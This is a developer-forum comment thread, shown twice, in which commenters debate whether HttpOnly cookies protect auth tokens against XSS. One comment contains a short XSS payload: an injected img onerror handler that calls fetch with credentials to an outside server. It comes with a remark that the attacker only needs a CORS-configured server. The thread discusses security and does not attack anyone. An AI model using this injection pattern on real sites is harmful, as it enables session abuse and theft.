That's not accurate. HttpOnly cookies do help to protect against XSS by preventing client side access to the token. This is useful if you have 3rd party JavaScript injected to the page (plugins, trackers etc.).
See more here: cheatsheetseries.owasp.org/cheatsh...
Please read this: academind.com/tutorials/localstora...
The main idea is that even with HTTP-ONLY cookie type, I could XSS the browser and retrieve the token value by doing:
const userPickedImageUrl = 'https://some-invalid-url.com/no-image!jpg" onerror="fetch("https://localhost:8000/", { credentials: "include" })' const contentWithUserInput = ` <img src="${userPickedImageUrl}"> ` outputElement.innerHTML = contentWithUserInput
Then all I need to do is to set up a server with appropriate CORS
Are you sure you want to hide this comment? It will become hidden in your post, but will still be visible via the comment's permalink.
Hide child comments as well
Confirm
For further actions, you may consider blocking this person and/or reporting abuse
We're a place where coders share, stay up-to-date and grow their careers.
That's not accurate. HttpOnly cookies do help to protect against XSS by preventing client side access to the token. This is useful if you have 3rd party JavaScript injected to the page (plugins, trackers etc.).
See more here: cheatsheetseries.owasp.org/cheatsh...
Please read this: academind.com/tutorials/localstora...
The main idea is that even with HTTP-ONLY cookie type, I could XSS the browser and retrieve the token value by doing:
Then all I need to do is to set up a server with appropriate CORS